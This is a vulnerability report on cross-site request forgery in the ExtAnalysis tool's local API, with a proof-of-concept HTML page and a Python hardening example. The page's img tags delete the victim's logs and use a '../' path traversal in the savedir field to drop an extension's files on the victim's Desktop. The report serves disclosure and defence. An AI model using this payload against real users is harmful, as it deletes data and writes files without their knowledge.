Cross-Site Request Forgery (CSRF) in tuhinshubhra/extanalysis
Valid
Reported on Apr 3rd 2020
Overview
The ExtAnalysis project is vulnerable to several CSRF attacks. Its local API accepts state-changing requests over plain GET without any CSRF token, so a page on a malicious host that the victim opens while the server is running can trigger those requests in the victim's browser. This can delete the victim's logs (loss of functionality) and, because the `savedir` parameter is not confined to the analysis directory, can place an extension's files in arbitrary directories on the victim's machine, all without the victim's knowledge.
Proof of Concept (Credit: Mik317)
- Download the git project and run the server with the `python2 extanalysis.py` command.
- Place the following code on a malicious host and have the victim open it while the server is running:
<html>
<!-- Downloads the Gmass extension into the victim's `Desktop` folder via a `../` traversal in `savedir`.
     Fix: reject `../` in `savedir` and require a CSRF token -->
<img
src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked"
/>
<!-- Deletes all the logs without the victim's knowledge. Fix: require a CSRF token -->
<img src="http://127.0.0.1:13337/api/?query=deleteAll" />
</html>
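The two fixes the comments in the PoC ask for, shown together as an added example that is not ExtAnalysis code and does not use its real handler: a small Python 3 dispatcher for the `/api/?query=...` endpoint shape seen above that (1) refuses state-changing queries (`dlanalysis`, `deleteAll`) unless they arrive as POST with a per-session CSRF token compared in constant time, and (2) resolves `savedir` under a fixed base directory and rejects anything that escapes it. The function names, the `csrf_token` form field, the `base_dir` value and the status codes are assumptions made for the example.

```python
import hmac
import os
import secrets
from urllib.parse import parse_qs, urlsplit

# Example hardening for the endpoint shape in the PoC; hypothetical, not
# the project's own code. State-changing queries must be POSTed together
# with the session's CSRF token; the token itself never travels in the URL.
STATE_CHANGING = {"dlanalysis", "deleteAll"}


def new_csrf_token():
    """Unguessable per-session token; the server stores it and embeds it in its own pages."""
    return secrets.token_urlsafe(32)


def csrf_token_valid(session_token, submitted_token):
    """Constant-time comparison; a missing or empty token never validates."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token.encode("utf-8"),
                               submitted_token.encode("utf-8"))


def safe_savedir(base_dir, savedir):
    """Resolve savedir under base_dir. Returns the absolute target, or None if it escapes."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, savedir))
    if os.path.commonpath([base, target]) != base:
        return None  # '../' (or a symlink) would write outside the analysis directory
    return target


def handle_api(method, url, form, session_token, base_dir):
    """Dispatch one request. `form` is the parsed POST body (assumed dict of str -> str).
    Returns (status, detail) so the decision can be checked without a real server."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    query = params.get("query", "")

    if query in STATE_CHANGING:
        # An <img src=...> from a third-party page can only issue GET, so
        # requiring POST already blocks the PoC; the token check also blocks
        # auto-submitted cross-site forms.
        if method != "POST":
            return 405, "state-changing query must use POST"
        if not csrf_token_valid(session_token, form.get("csrf_token")):
            return 403, "missing or invalid CSRF token"

    if query == "dlanalysis":
        target = safe_savedir(base_dir, params.get("savedir", ""))
        if target is None:
            return 400, "savedir escapes the analysis directory"
        return 200, "download to %s" % target
    if query == "deleteAll":
        return 200, "logs deleted"
    return 404, "unknown query"
```

Run against the two URLs from the PoC, both requests are refused with 405 before any token or path check, a POST without the token gets 403, and a POST with a valid token but the `../../../Desktop/hacked` path gets 400; only a POST with the session token and an in-bounds `savedir` proceeds. Checking `Origin`/`Referer` headers would be a reasonable extra layer, but it does not replace the token, since those headers are not always sent.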